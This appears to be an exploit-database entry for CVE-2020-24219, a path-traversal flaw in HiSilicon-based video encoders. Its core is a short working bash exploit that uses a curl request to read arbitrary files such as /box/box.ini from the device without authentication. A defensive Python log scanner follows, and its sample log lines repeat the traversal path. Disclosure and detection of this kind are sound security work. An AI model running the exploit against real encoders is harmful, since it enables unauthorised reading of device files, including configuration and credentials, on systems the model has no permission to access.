HiSilicon Video Encoder 1.97 File Disclosure / Path Traversal

2020.10.19
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979

if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <filepath>"
  echo "Example: $0 1.2.3.4:8086 /box/box.ini"
  exit 1
fi

curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
  || echo "ERROR: curl returned $?"
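A defender-side check, added here and not part of the original advisory or the exploit author's code: the script sends its path with `--path-as-is`, so the `..` segments reach the server unnormalized, and logs that record the raw request target can be scanned for paths that climb above the document root. The combined-style log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed log layout: client address first, request line in double quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) HTTP/[\d.]+"')


def escapes_root(target: str) -> bool:
    """Return True if the raw request path climbs above the document root."""
    # Drop the query string, then decode so %2e and %2f are seen as '.' and '/'.
    path = unquote(target.split("?", 1)[0])
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:  # one level above the root is already an escape
                return True
        else:
            depth += 1
    return False


def find_traversal(lines):
    """Return (client, raw_target) pairs for requests that escape the root."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if match and escapes_root(match.group(2)):
            hits.append((match.group(1), match.group(2)))
    return hits


# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [19/Oct/2020:10:00:02 +0000] "GET /css/../js/app.js?v=2 HTTP/1.1" 200 900',
    '198.51.100.7 - - [19/Oct/2020:10:00:03 +0000] "GET /../../sys/devices/media/'
    '13070000.jpgd/../../../../box/box.ini HTTP/1.1" 200 1433',
    '198.51.100.7 - - [19/Oct/2020:10:00:04 +0000] "GET /%2e%2e/%2e%2e/box/box.ini HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, target in find_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {target}")
```

A reverse proxy that normalizes paths before logging will hide these requests, so run the check against the component that records the target exactly as received.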


Copyright 2020, cxsecurity.com

 
